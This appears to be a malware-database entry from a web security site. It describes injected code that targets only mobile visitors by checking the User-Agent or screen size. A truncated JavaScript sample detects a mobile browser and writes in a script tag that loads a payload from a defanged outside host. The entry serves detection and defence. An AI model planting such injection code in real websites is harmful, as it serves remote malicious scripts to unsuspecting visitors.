Home Testimonials Company Support 1–888–873–0817
PRICING SUPPORT LOGIN
Home Notes Malware Signatures About

Malware entry: malware.mobile

Description: Detected malicious code that targets only visitors that use mobile devices. Typically malware checks either User-Agent header or screen dimensions to determine whether a mobile browser is used.

Malware that targets mobile users may use rewrite rules in .htaccess files, server-side scripts (e.g. PHP, ASP, etc) or client-side script (e.g. JavaScript).

Example of JavaScript based mobile malware

function isMobile() {

var a = (navigator.userAgent|​|navigator.vendor|​|window.opera);
    if(/android​.+mobile|avantgo|bada​\/|blackberry|blazer|compal|elaine|fennec|hiptop|​iemobile|ip
    ...skipped...
    |nc|nw)|wmlb|wonu|x700|yas​\-|your|zeto|zte\-/i.​test(a.​substr(0,4))){ 
    return true;
    } 

return false;
}

if(isMobile() === true) {document .write('<script type="text/javascript" src="hxxp://tizermedias[.]com/odessa/​?H6rRyf"></script>');



Affecting: Any web site (no specific target).

For all our web-based malware signatures, go here: http://labs.sucuri.net/?malwaredb